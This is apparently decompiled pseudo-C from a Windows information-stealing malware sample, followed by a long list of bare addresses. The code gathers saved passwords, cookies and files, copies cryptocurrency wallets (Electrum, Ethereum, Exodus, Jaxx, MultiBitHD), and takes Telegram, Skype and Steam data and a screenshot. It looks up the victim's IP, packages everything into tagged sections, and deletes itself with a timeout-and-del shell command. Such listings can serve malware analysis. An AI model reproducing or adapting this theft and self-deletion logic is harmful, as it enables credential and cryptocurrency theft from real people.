                                          					_t1015 =  *0x405f50; // 0x405f54
                                          					E00404280( &_v64, 5, _t1015);
                                          					E00403508( &_v44, 8);
                                          					E004034E4( &_v8);
                                          					E00403508( &_v108, 5);
                                          					return E00403508( &_v84, 3);
                                          				}
                                          				E0040357C( &_v16, 0x419888);
                                          				E00416DD4( &_v16, __ebx, 0x80000, 0x419928, __edi, __esi);
                                          				E004069A8(_v16, _t962,  &_v316, __edi, _t1157);
                                          				E0040357C( &_v16, _v316);
                                          				E00406CE8( &_v324, _t962, _t1157); // executed
                                          				E00406834(_v324, _t962, 0x80000,  &_v320, _t1151, _t1157);
                                          				E004037DC( &_v36, _v320, 0x419934);
                                          				E00416DD4( &_v36, _t962, 0x80000, _v92, _t1151, _t1157);
                                          				E00417D84(_v16, _t962, _v36, _t1151, _t1157,  &_v20); // executed
                                          				E00416DD4( &_v20, _t962, 0x80000, _v92, _t1151, _t1157);
                                          				_t1164 = E00403790(_v20) - 0x2710;
                                          				if(_t1164 < 0) {
                                          					goto L71;
                                          				}
                                          				E004038DC(_v20, 0x419940);
                                          				if(_t1164 == 0) {
                                          					goto L71;
                                          				}
                                          				E004074E8(0x419960, _t962, 0x419950, _v20, _t1157,  &_v328);
                                          				E004069A8(_v328, _t962,  &_v40, _t1151, _t1157);
                                          				E004074E8(0x41997c, _t962, 0x41996c, _v20, _t1157,  &_v332);
                                          				E00406B08(_v332, _t962,  &_v44, _t1151, _t1157);
                                          				E00407A18(0x419988,  &_v48, _v40, _t1164);
                                          				_t977 = 0x419994;
                                          				E004074E8(0x4199a4, _t962, 0x419994, _v20, _t1157,  &_v340);
                                          				_t1035 =  &_v336;
                                          				E004069A8(_v340, _t962,  &_v336, _t1151, _t1157);
                                          				E00408180(_v336, _t1164);
                                          				E00409668(_v44, _t962, _t1157, _t1164);
                                          				E0040E630();
                                          				_t1153 = E00404648(_v48) - 1;
                                          				if(_t1153 < 0) {
                                          					L51:
                                          					_t238 =  &_v8; // 0x2b
                                          					_push( *_t238);
                                          					_push(0x419988);
                                          					E0041698C( &_v460, _t962, _t1035, _t1153, _t1157);
                                          					_push(_v460);
                                          					E00403850();
                                          					E0040E6D4(_v456, _t962, "System.txt", _t1153, _t1157);
                                          					E00406CE8( &_v468, _t962, _t1157);
                                          					E00406834(_v468, _t962, _t977,  &_v464, _t1153, _t1157);
                                          					_push(_v464);
                                          					_push(0x419ec0);
                                          					E00407B08( &_v476, _t962, _t1153, _t1157);
                                          					E00406834(_v476, _t962, _t977,  &_v472, _t1153, _t1157);
                                          					_push(_v472);
                                          					_push(0x419ec0);
                                          					E00406BD8( &_v488);
                                          					E0040377C( &_v484, _v488);
                                          					E00406834(_v484, _t962, _t977,  &_v480, _t1153, _t1157);
                                          					_push(_v480);
                                          					_push(0x419ec0);
                                          					E004066E4( &_v500, _t1192);
                                          					E0040377C( &_v496, _v500);
                                          					E00406834(_v496, _t962, _t977,  &_v492, _t1153, _t1157);
                                          					_push(_v492);
                                          					_push(0x419ec0);
                                          					E00406634( &_v512);
                                          					E0040377C( &_v508, _v512);
                                          					E00406834(_v508, _t962, _t977,  &_v504, _t1153, _t1157);
                                          					_push(_v504);
                                          					_push(0x419ec0);
                                          					E004065F0( &_v524);
                                          					E0040377C( &_v520, _v524);
                                          					E00406834(_v520, _t962, _t977,  &_v516, _t1153, _t1157);
                                          					_push(_v516);
                                          					_push(0x419ec0);
                                          					_t616 =  *0x41b2a8; // 0x41b0b8
                                          					E0040709C( *_t616, _t962,  &_v536, _t1157, _t1192);
                                          					E0040377C( &_v532, _v536);
                                          					E00406834(_v532, _t962, _t977,  &_v528, _t1153, _t1157);
                                          					_push(_v528);
                                          					_push(0x419ec0);
                                          					_t623 =  *0x41b2c4; // 0x41b0b0
                                          					E0040709C( *_t623, _t962,  &_v548, _t1157, _t1192);
                                          					E0040377C( &_v544, _v548);
                                          					E00406834(_v544, _t962, _t977,  &_v540, _t1153, _t1157);
                                          					_push(_v540);
                                          					_push(0x419ec0);
                                          					_t630 =  *0x41b1cc; // 0x41b0b4
                                          					E0040709C( *_t630, _t962,  &_v560, _t1157, _t1192);
                                          					E0040377C( &_v556, _v560);
                                          					E00406834(_v556, _t962, _t977,  &_v552, _t1153, _t1157);
                                          					_push(_v552);
                                          					_push(0x419ec0);
                                          					_t637 =  *0x41b3f8; // 0x41b0ac
                                          					E0040709C( *_t637, _t962,  &_v572, _t1157, _t1192);
                                          					E0040377C( &_v568, _v572);
                                          					E00406834(_v568, _t962, _t977,  &_v564, _t1153, _t1157);
                                          					_push(_v564);
                                          					_push(0x419ec0);
                                          					E00406834(_v8, _t962, _t977,  &_v576, _t1153, _t1157);
                                          					_push(_v576);
                                          					_push(0x419ec0);
                                          					E00407DE0( &_v584, _t1192);
                                          					E00406834(_v584, _t962, _t977,  &_v580, _t1153, _t1157);
                                          					_push(_v580);
                                          					E00403850();
                                          					_push("<info");
                                          					_t651 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t651);
                                          					_push(0x419edc);
                                          					_push(_v28);
                                          					_push("</info");
                                          					_t652 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t652);
                                          					_push(0x419edc);
                                          					_push(0x419988);
                                          					_push("<pwds");
                                          					_t653 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t653);
                                          					_push(0x419edc);
                                          					E004063C8( &_v588, _t962, _t1153, _t1157);
                                          					_push(_v588);
                                          					_push("</pwds");
                                          					_t656 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t656);
                                          					_push(0x419edc);
                                          					_push(0x419988);
                                          					_push("<coks");
                                          					_t657 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t657);
                                          					_push(0x419edc);
                                          					E00406560( &_v592, _t962, _t977, _t1153, _t1157);
                                          					_push(_v592);
                                          					_push("</coks");
                                          					_t660 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t660);
                                          					_push(0x419edc);
                                          					_push(0x419988);
                                          					_push("<file");
                                          					_t661 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t661);
                                          					_push(0x419edc);
                                          					E0040E8D0( &_v596, _t962, _t1192);
                                          					_push(_v596);
                                          					_push("</file");
                                          					_t664 =  *0x41b350; // 0x41b0bc
                                          					_push( *_t664);
                                          					_push(0x419edc);
                                          					_push(0x419988);
                                          					E00403850();
                                          					_t1193 = _v85 - 1;
                                          					if(_v85 == 1) {
                                          						_push(_v24);
                                          						_push("<ip");
                                          						_t751 =  *0x41b350; // 0x41b0bc
                                          						_push( *_t751);
                                          						_push(0x419edc);
                                          						_push(_v80);
                                          						_push(0x419e90);
                                          						_push(_v84);
                                          						_push("</ip");
                                          						_t752 =  *0x41b350; // 0x41b0bc
                                          						_push( *_t752);
                                          						_push(0x419edc);
                                          						_push(0x419988);
                                          						E00403850();
                                          					}
                                          					E00416DD4( &_v24, _t962, 0x80000, _v92, _t1153, _t1157);
                                          					_t979 = 0;
                                          					E00417D84(_v16, _t962, _v24, _t1153, _t1157,  &_v600);
                                          					_t672 =  *0x41b3a0; // 0x41c6a0
                                          					 *((intOrPtr*)( *_t672))(_v112);
                                          					E00405114(0x419f74, _t962, _t1153, _t1157, _t1193);
                                          					_t678 = E00403790(_v76);
                                          					_t1194 = _t678 - 3;
                                          					if(_t678 <= 3) {
                                          						L65:
                                          						E004099C0(_t962, _t1157);
                                          						E00407DE0( &_v608, _t1205);
                                          						E004038DC(_v608, 0x419fa4);
                                          						if(_t1205 != 0) {
                                          							L68:
                                          							E004038DC(_v8, 0x419fb0);
                                          							if(__eflags == 0) {
                                          								__eflags = _v86 - 1;
                                          								if(_v86 == 1) {
                                          									E004028E0( &_v304, 0x3c);
                                          									_v304 = 0x3c;
                                          									_v300 = 0x1c0;
                                          									_v296 = 0;
                                          									_v292 = 0;
                                          									E004062FC(L"%comspec%",  &_v612, __eflags);
                                          									_v288 = E00403D98(_v612);
                                          									E004062FC(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v620, __eflags);
                                          									E00402754(0,  &_v632);
                                          									E00403D88( &_v628, _v632);
                                          									E004077C8(_v628, _t962, 0,  &_v624, _t1157, __eflags);
                                          									E00403E78();
                                          									_v284 = E00403D98(_v616);
                                          									E00402754(0,  &_v644);
                                          									E00403D88( &_v640, _v644);
                                          									E00407854(_v640, _t962, 0,  &_v636, _t1157, __eflags);
                                          									_v280 = E00403D98(_v636);
                                          									__eflags = 0;
                                          									_v276 = 0;
                                          									_t715 =  *0x41b150; // 0x41c764
                                          									 *((intOrPtr*)( *_t715))( &_v304, E0041A02C, _v624, _v620);
                                          									ExitProcess(0);
                                          								}
                                          							}
                                          							goto L71;
                                          						}
                                          						E004038DC(_v8, 0x419fb0);
                                          						if(_t1205 != 0) {
                                          							goto L68;
                                          						}
                                          						E00407E90(_t962, _t979, _t1153, _t1157, _t1205);
                                          						goto L71;
                                          					} else {
                                          						_t979 =  &_v56;
                                          						E00407A18(0x419988,  &_v56, _v76, _t1194);
                                          						_t1153 = E00404648(_v56) - 1;
                                          						if(_t1153 < 0) {
                                          							goto L65;
                                          						}
                                          						_t1155 = _t1153 + 1;
                                          						_t963 = 0;
                                          						do {
                                          							_push(0);
                                          							E00404804();
                                          							_t1161 = _t1161 + 4;
                                          							_t979 =  &_v60;
                                          							E00407A18(0x419db4,  &_v60,  *((intOrPtr*)(_v56 + _t963 * 4)), 0);
                                          							_t1197 = E00404648(_v60) - 4;
                                          							if(_t1197 != 0) {
                                          								goto L64;
                                          							}
                                          							E004038DC( *_v60, 0x419f80);
                                          							if(_t1197 != 0) {
                                          								goto L64;
                                          							}
                                          							_t979 =  &_v64;
                                          							E00407A18(0x419f8c,  &_v64,  *((intOrPtr*)(_v60 + 0xc)), _t1197);
                                          							_v87 = 0;
                                          							_t1157 = E00404648(_v64) - 1;
                                          							if(_t1157 < 0) {
                                          								L62:
                                          								_t1203 = _v87 - 1;
                                          								if(_v87 == 1) {
                                          									E004038DC( *((intOrPtr*)(_v60 + 8)), 0x419f98);
                                          									E0041841C( *((intOrPtr*)(_v60 + 4)), _t963, 0x419f00 | _t1203 == 0x00000000, _t1155, _t1157);
                                          								}
                                          								goto L64;
                                          							}
                                          							_t1157 = _t1157 + 1;
                                          							_v72 = 0;
                                          							while(1) {
                                          								E0040633C( *((intOrPtr*)(_v64 + _v72 * 4)), _t963,  &_v604, _t1155, _t1157);
                                          								_t1088 =  *0x41b154; // 0x41c66c
                                          								_v87 = E00403AD4(_v604,  *_t1088) != 0;
                                          								if(_v87 == 1) {
                                          									goto L62;
                                          								}
                                          								_v72 = _v72 + 1;
                                          								_t1157 = _t1157 - 1;
                                          								if(_t1157 != 0) {
                                          									continue;
                                          								}
                                          								goto L62;
                                          							}
                                          							goto L62;
                                          							L64:
                                          							_t963 = _t963 + 1;
                                          							_t1155 = _t1155 - 1;
                                          							_t1205 = _t1155;
                                          						} while (_t1205 != 0);
                                          						goto L65;
                                          					}
                                          				} else {
                                          					_t1156 = _t1153 + 1;
                                          					_t964 = 0;
                                          					do {
                                          						if(E00403790( *((intOrPtr*)(_v48 + _t964 * 4))) < 5) {
                                          							goto L50;
                                          						}
                                          						if(_t964 != 0) {
                                          							L34:
                                          							_t757 = _v48;
                                          							_t1186 =  *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) - 0x46;
                                          							if( *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) != 0x46) {
                                          								L44:
                                          								if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) == 0x4c) {
                                          									_push(_v76);
                                          									_push( *((intOrPtr*)(_v48 + _t964 * 4)));
                                          									_push(0x419988);
                                          									_t1035 = 3;
                                          									E00403850();
                                          								}
                                          								_t1191 =  *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) - 0x49;
                                          								if(_t1191 == 0) {
                                          									_t977 =  &_v52;
                                          									E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1191);
                                          									E004038DC( *((intOrPtr*)(_v52 + 4)), 0x419e20);
                                          									if(_t1191 != 0) {
                                          										_t1035 = "ip.txt";
                                          										E0040E6D4( *((intOrPtr*)(_v52 + 4)), _t964, "ip.txt", _t1156, _t1157);
                                          									} else {
                                          										_v85 = 1;
                                          										E00417D84("http://ip-api.com/json", _t964, 0, _t1156, _t1157,  &_v32);
                                          										E004074E8("\"query\":\"", _t964, 0x419e58, _v32, _t1157,  &_v80);
                                          										_t977 = 0x419e58;
                                          										E004074E8("\"countryCode\":\"", _t964, 0x419e58, _v32, _t1157,  &_v84);
                                          										_push(_v80);
                                          										_push(0x419e90);
                                          										_push(_v84);
                                          										E00403850();
                                          										_t1035 = "ip.txt";
                                          										E0040E6D4(_v452, _t964, "ip.txt", _t1156, _t1157);
                                          									}
                                          								}
                                          								goto L50;
                                          							}
                                          							E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1186);
                                          							E0040357C( &_v96,  *((intOrPtr*)(_v52 + 8)));
                                          							if(E00403AD4(0x419dc0, _v96) != 1) {
                                          								E00403D88( &_v424,  *((intOrPtr*)(_v52 + 0x1c)));
                                          								_push(_v424);
                                          								E00403D88( &_v428,  *((intOrPtr*)(_v52 + 0x10)));
                                          								_push(E00407108(_v428, _t964,  &_v52, __eflags));
                                          								_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
                                          								_t807 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
                                          								_t192 = __eflags == 0;
                                          								__eflags = _t192;
                                          								_push(_t807 & 0xffffff00 | _t192);
                                          								_push(1);
                                          								_push("Files\\");
                                          								_push( *((intOrPtr*)(_v52 + 4)));
                                          								_push(0x419de8);
                                          								E00403850();
                                          								E00403D88( &_v432, _v436);
                                          								_push(_v432);
                                          								E00403D88( &_v440,  *((intOrPtr*)(_v52 + 0xc)));
                                          								_push(_v440);
                                          								E004037DC( &_v448, 0x419de8,  *((intOrPtr*)(_v52 + 8)));
                                          								E00403D88( &_v444, _v448);
                                          								_pop(_t1035);
                                          								_pop(_t977);
                                          								E00413F58(_v444, _t964, _t977, _t1035, _t1156, _t1157);
                                          								goto L44;
                                          							}
                                          							_t977 = 0x419dd0;
                                          							_t1035 = _v96;
                                          							E004074E8(0x419dc0, _t964, 0x419dd0, _v96, _t1157,  &_v108);
                                          							_push( &_v241);
                                          							_push(0x81);
                                          							_t828 =  *0x41b240; // 0x41c6f8
                                          							if( *((intOrPtr*)( *_t828))() == 0) {
                                          								goto L71;
                                          							}
                                          							_t1157 =  &_v241;
                                          							while( *_t1157 != 0) {
                                          								_t831 =  *0x41b114; // 0x41c6fc
                                          								E0040709C( *((intOrPtr*)( *_t831))(_t1157), _t964,  &_v356, _t1157, __eflags);
                                          								E0040377C( &_v352, _v356);
                                          								_t1035 = _v108;
                                          								_t838 = E00403AD4(_v352, _v108);
                                          								__eflags = _t838;
                                          								if(_t838 != 0) {
                                          									_push( &_v360);
                                          									E00403CF4( &_v364, _t1157);
                                          									_push(_v364);
                                          									_push("%DSK_");
                                          									_push(_v108);
                                          									E00403850();
                                          									E00403D88( &_v368, _v372);
                                          									_push(_v368);
                                          									E00403D88( &_v376, _v96);
                                          									_pop(_t1125);
                                          									_t989 = 0x419ddc;
                                          									E0040717C(_v376, _t964, _t989, _t1125);
                                          									E0040377C( &_v104, _v360);
                                          									E004034E4( &_v100);
                                          									_push( *((intOrPtr*)(_v52 + 4)));
                                          									_push(0x419de8);
                                          									_push(_v104);
                                          									E00403850();
                                          									E00403D88( &_v384, _v100);
                                          									E0040717C(_v384, _t964, 0, 0x419df0,  &_v380);
                                          									E00403DB4( &_v380, 0, 0x419df8, __eflags);
                                          									E0040377C( &_v100, _v380);
                                          									E00403D88( &_v392, _v100);
                                          									E004078D8(_v392, _t964,  &_v388, __eflags);
                                          									E0040377C( &_v100, _v388);
                                          									E00403D88( &_v396,  *((intOrPtr*)(_v52 + 0x1c)));
                                          									_push(_v396);
                                          									E00403D88( &_v400,  *((intOrPtr*)(_v52 + 0x10)));
                                          									_push(E00407108(_v400, _t964, 0, __eflags));
                                          									_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
                                          									_t885 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
                                          									_t162 = __eflags == 0;
                                          									__eflags = _t162;
                                          									_push(_t885 & 0xffffff00 | _t162);
                                          									_push(1);
                                          									E004037DC( &_v408, _v100, "Files\\");
                                          									E00403D88( &_v404, _v408);
                                          									_push(_v404);
                                          									E00403D88( &_v412,  *((intOrPtr*)(_v52 + 0xc)));
                                          									_push(_v412);
                                          									E004037DC( &_v420, 0x419de8, _v104);
                                          									E00403D88( &_v416, _v420);
                                          									_pop(_t1035);
                                          									_pop(_t977);
                                          									E00413F58(_v416, _t964, _t977, _t1035, _t1156, _t1157);
                                          								}
                                          								_t1157 = _t1157 + 4;
                                          								__eflags = _t1157;
                                          							}
                                          							goto L44;
                                          						} else {
                                          							_t902 =  *((intOrPtr*)(_v48 + _t964 * 4));
                                          							_t1169 =  *((char*)(_t902 + 1)) - 0x2b;
                                          							if( *((char*)(_t902 + 1)) == 0x2b) {
                                          								E0040E1DC(_t964, _t1035, _t1156, _t1157, _t1169, _t1207);
                                          								E00405424( &_v344);
                                          								_t1035 = "PasswordsList.txt";
                                          								E0040E6D4(_v344, _t964, "PasswordsList.txt", _t1156, _t1157);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 2)) == 0x2b) {
                                          								E00413BB4();
                                          								E00405574( &_v348);
                                          								_t1118 =  *0x41b2fc; // 0x41ca18
                                          								_t1035 =  *_t1118;
                                          								E0040E6D4(_v348, _t964,  *_t1118, _t1156, _t1157);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 9)) == 0x2b) {
                                          								E00413BE8();
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 3)) == 0x2b) {
                                          								E00414DE8(L"Coins", _t964, _t1156, _t1157);
                                          								_t934 = E00413F58(L"%appdata%\\Electrum\\wallets\\", _t964, L"Coins\\Electrum", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
                                          								_t1111 =  *0x41b2c4; // 0x41b0b0
                                          								 *_t1111 =  *_t1111 + _t934;
                                          								_t936 = E00413F58(L"%appdata%\\Electrum-LTC\\wallets\\", _t964, L"Coins\\Electrum-LTC", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
                                          								_t1113 =  *0x41b2c4; // 0x41b0b0
                                          								 *_t1113 =  *_t1113 + _t936;
                                          								_t938 = E00413F58(L"%APPDATA%\\Ethereum\\keystore\\", _t964, L"Coins\\Ethereum", L"UTC*", _t1156, _t1157, 0, 0, 1, 0x1388, 0);
                                          								_t1115 =  *0x41b2c4; // 0x41b0b0
                                          								 *_t1115 =  *_t1115 + _t938;
                                          								if(E00413F58(L"%APPDATA%\\Exodus\\", _t964, L"Coins\\Exodus", L"*.json,*.seco", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                                          									_t950 =  *0x41b2c4; // 0x41b0b0
                                          									 *_t950 =  *_t950 + 1;
                                          								}
                                          								if(E00413F58(L"%APPDATA%\\Jaxx\\Local Storage\\", _t964, L"Coins\\Jaxx\\Local Storage\\", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                                          									_t949 =  *0x41b2c4; // 0x41b0b0
                                          									 *_t949 =  *_t949 + 1;
                                          								}
                                          								_t977 = L"Coins\\MultiBitHD";
                                          								_t1035 = L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml";
                                          								if(E00413F58(L"%APPDATA%\\MultiBitHD\\", _t964, L"Coins\\MultiBitHD", L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
                                          									_t948 =  *0x41b2c4; // 0x41b0b0
                                          									 *_t948 =  *_t948 + 1;
                                          								}
                                          								_t945 =  *0x41b2c4; // 0x41b0b0
                                          								_t1179 =  *_t945;
                                          								if( *_t945 > 0) {
                                          									E00405114(0x419cd8, _t964, _t1156, _t1157, _t1179);
                                          								}
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 4)) == 0x2b) {
                                          								E00414808(L"Skype", _t964, _t1156, _t1157);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 5)) == 0x2b) {
                                          								_t977 = L"Telegram";
                                          								_t1035 = L"D877F783D5*,map*";
                                          								E00413F58(L"%appdata%\\Telegram Desktop\\tdata\\", _t964, L"Telegram", L"D877F783D5*,map*", _t1156, _t1157, 0, 0, 1, 0x3e8, 0);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 6)) == 0x2b) {
                                          								E00414A90(L"Steam", _t964, _t1156, _t1157);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 7)) == 0x2b) {
                                          								_push(0);
                                          								_push(0x32);
                                          								_push(L"image/jpeg");
                                          								_push( &_v68);
                                          								_push(GetSystemMetrics(1));
                                          								_t921 = GetSystemMetrics(0);
                                          								_t977 = 0;
                                          								_pop(_t1109);
                                          								E00416FB0(_t921, _t964, 0, _t1109, _t1156, _t1157);
                                          								_t1035 = "scr.jpg";
                                          								E0040E6D4(_v68, _t964, "scr.jpg", _t1156, _t1157);
                                          							}
                                          							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 8)) == 0x2b) {
                                          								_v86 = 1;
                                          							}
                                          							goto L34;
                                          						}
                                          						L50:
                                          						_t964 = _t964 + 1;
                                          						_t1156 = _t1156 - 1;
                                          						_t1192 = _t1156;
                                          					} while (_t1156 != 0);
                                          					goto L51;
                                          				}
                                          			}
                                          0x00419721
                                          0x00419731
                                          0x0041973c
                                          0x0041974c
                                          0x00419757
                                          0x00419767
                                          0x00419772
                                          0x00419782
                                          0x00419792
                                          0x0041979d
                                          0x004197ad
                                          0x004197b8
                                          0x004197c8
                                          0x004197d3
                                          0x004197e3
                                          0x004197ee
                                          0x004197fe
                                          0x0041980e
                                          0x00419816
                                          0x0041981e
                                          0x00419829
                                          0x00419836
                                          0x0041983e
                                          0x0041984b
                                          0x0041985d
                                          0x0041985d
                                          0x00418772
                                          0x00418784
                                          0x00418792
                                          0x004187a0
                                          0x004187ab
                                          0x004187bc
                                          0x004187cf
                                          0x004187df
                                          0x004187f0
                                          0x00418800
                                          0x0041880d
                                          0x00418812
                                          0x00000000
                                          0x00000000
                                          0x00418820
                                          0x00418825
                                          0x00000000
                                          0x00000000
                                          0x0041883f
                                          0x0041884d
                                          0x00418866
                                          0x00418874
                                          0x00418884
                                          0x00418890
                                          0x0041889d
                                          0x004188a8
                                          0x004188ae
                                          0x004188b9
                                          0x004188c1
                                          0x004188c8
                                          0x004188d7
                                          0x004188da
                                          0x00418fb5
                                          0x00418fb5
                                          0x00418fb5
                                          0x00418fb8
                                          0x00418fc3
                                          0x00418fc8
                                          0x00418fd9
                                          0x00418fe9
                                          0x00418ff4
                                          0x00419005
                                          0x0041900a
                                          0x00419010
                                          0x0041901b
                                          0x0041902c
                                          0x00419031
                                          0x00419037
                                          0x00419042
                                          0x00419053
                                          0x00419064
                                          0x00419069
                                          0x0041906f
                                          0x0041907a
                                          0x0041908b
                                          0x0041909c
                                          0x004190a1
                                          0x004190a7
                                          0x004190b2
                                          0x004190c3
                                          0x004190d4
                                          0x004190d9
                                          0x004190df
                                          0x004190ea
                                          0x004190fb
                                          0x0041910c
                                          0x00419111
                                          0x00419117
                                          0x00419122
                                          0x00419129
                                          0x0041913a
                                          0x0041914b
                                          0x00419150
                                          0x00419156
                                          0x00419161
                                          0x00419168
                                          0x00419179
                                          0x0041918a
                                          0x0041918f
                                          0x00419195
                                          0x004191a0
                                          0x004191a7
                                          0x004191b8
                                          0x004191c9
                                          0x004191ce
                                          0x004191d4
                                          0x004191df
                                          0x004191e6
                                          0x004191f7
                                          0x00419208
                                          0x0041920d
                                          0x00419213
                                          0x00419221
                                          0x00419226
                                          0x0041922c
                                          0x00419237
                                          0x00419248
                                          0x0041924d
                                          0x0041925b
                                          0x00419260
                                          0x00419265
                                          0x0041926a
                                          0x0041926c
                                          0x00419271
                                          0x00419274
                                          0x00419279
                                          0x0041927e
                                          0x00419280
                                          0x00419285
                                          0x0041928a
                                          0x0041928f
                                          0x00419294
                                          0x00419296
                                          0x004192a1
                                          0x004192a6
                                          0x004192ac
                                          0x004192b1
                                          0x004192b6
                                          0x004192b8
                                          0x004192bd
                                          0x004192c2
                                          0x004192c7
                                          0x004192cc
                                          0x004192ce
                                          0x004192d9
                                          0x004192de
                                          0x004192e4
                                          0x004192e9
                                          0x004192ee
                                          0x004192f0
                                          0x004192f5
                                          0x004192fa
                                          0x004192ff
                                          0x00419304
                                          0x00419306
                                          0x00419311
                                          0x00419316
                                          0x0041931c
                                          0x00419321
                                          0x00419326
                                          0x00419328
                                          0x0041932d
                                          0x0041933a
                                          0x0041933f
                                          0x00419343
                                          0x00419345
                                          0x00419348
                                          0x0041934d
                                          0x00419352
                                          0x00419354
                                          0x00419359
                                          0x0041935c
                                          0x00419361
                                          0x00419364
                                          0x00419369
                                          0x0041936e
                                          0x00419370
                                          0x00419375
                                          0x00419382
                                          0x00419382
                                          0x00419392
                                          0x0041939e
                                          0x004193a6
                                          0x004193af
                                          0x004193b6
                                          0x004193bd
                                          0x004193c5
                                          0x004193ca
                                          0x004193cd
                                          0x004194dd
                                          0x004194dd
                                          0x004194e8
                                          0x004194f8
                                          0x004194fd
                                          0x00419518
                                          0x00419520
                                          0x00419525
                                          0x0041952b
                                          0x0041952f
                                          0x00419542
                                          0x00419547
                                          0x00419551
                                          0x0041955d
                                          0x00419565
                                          0x00419576
                                          0x00419586
                                          0x00419597
                                          0x004195aa
                                          0x004195bb
                                          0x004195cc
                                          0x004195e7
                                          0x004195f7
                                          0x00419605
                                          0x00419616
                                          0x00419627
                                          0x00419637
                                          0x0041963d
                                          0x0041963f
                                          0x0041964c
                                          0x00419653
                                          0x00419657
                                          0x00419657
                                          0x0041952f
                                          0x00000000
                                          0x00419525
                                          0x00419507
                                          0x0041950c
                                          0x00000000
                                          0x00000000
                                          0x0041950e
                                          0x00000000
                                          0x004193d3
                                          0x004193d3
                                          0x004193de
                                          0x004193ed
                                          0x004193f0
                                          0x00000000
                                          0x00000000
                                          0x004193f6
                                          0x004193f7
                                          0x004193f9
                                          0x004193f9
                                          0x00419409
                                          0x0041940e
                                          0x00419411
                                          0x0041941f
                                          0x0041942c
                                          0x0041942f
                                          0x00000000
                                          0x00000000
                                          0x0041943f
                                          0x00419444
                                          0x00000000
                                          0x00000000
                                          0x0041944a
                                          0x00419458
                                          0x0041945d
                                          0x0041946b
                                          0x0041946e
                                          0x004194b1
                                          0x004194b1
                                          0x004194b5
                                          0x004194c2
                                          0x004194d0
                                          0x004194d0
                                          0x00000000
                                          0x004194b5
                                          0x00419470
                                          0x00419471
                                          0x00419478
                                          0x00419487
                                          0x00419492
                                          0x004194a1
                                          0x004194a9
                                          0x00000000
                                          0x00000000
                                          0x004194ab
                                          0x004194ae
                                          0x004194af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004194af
                                          0x00000000
                                          0x004194d5
                                          0x004194d5
                                          0x004194d6
                                          0x004194d6
                                          0x004194d6
                                          0x00000000
                                          0x004193f9
                                          0x004188e0
                                          0x004188e0
                                          0x004188e1
                                          0x004188e3
                                          0x004188f1
                                          0x00000000
                                          0x00000000
                                          0x004188f9
                                          0x00418b3e
                                          0x00418b3e
                                          0x00418b44
                                          0x00418b47
                                          0x00418ed1
                                          0x00418eda
                                          0x00418edc
                                          0x00418ee2
                                          0x00418ee5
                                          0x00418eed
                                          0x00418ef2
                                          0x00418ef2
                                          0x00418efd
                                          0x00418f00
                                          0x00418f06
                                          0x00418f14
                                          0x00418f24
                                          0x00418f29
                                          0x00418fa3
                                          0x00418fa8
                                          0x00418f2b
                                          0x00418f2b
                                          0x00418f3f
                                          0x00418f55
                                          0x00418f5e
                                          0x00418f6b
                                          0x00418f70
                                          0x00418f73
                                          0x00418f78
                                          0x00418f86
                                          0x00418f91
                                          0x00418f96
                                          0x00418f96
                                          0x00418f29
                                          0x00000000
                                          0x00418f00
                                          0x00418b5b
                                          0x00418b69
                                          0x00418b7c
                                          0x00418dfa
                                          0x00418e05
                                          0x00418e12
                                          0x00418e22
                                          0x00418e36
                                          0x00418e42
                                          0x00418e47
                                          0x00418e47
                                          0x00418e4a
                                          0x00418e4b
                                          0x00418e4d
                                          0x00418e55
                                          0x00418e58
                                          0x00418e68
                                          0x00418e79
                                          0x00418e84
                                          0x00418e91
                                          0x00418e9c
                                          0x00418eae
                                          0x00418ebf
                                          0x00418eca
                                          0x00418ecb
                                          0x00418ecc
                                          0x00000000
                                          0x00418ecc
                                          0x00418b86
                                          0x00418b8b
                                          0x00418b93
                                          0x00418b9e
                                          0x00418b9f
                                          0x00418ba4
                                          0x00418baf
                                          0x00000000
                                          0x00000000
                                          0x00418bb5
                                          0x00418de0
                                          0x00418bc1
                                          0x00418bd0
                                          0x00418be1
                                          0x00418bec
                                          0x00418bef
                                          0x00418bf4
                                          0x00418bf6
                                          0x00418c02
                                          0x00418c0b
                                          0x00418c16
                                          0x00418c17
                                          0x00418c1c
                                          0x00418c2f
                                          0x00418c40
                                          0x00418c4b
                                          0x00418c55
                                          0x00418c60
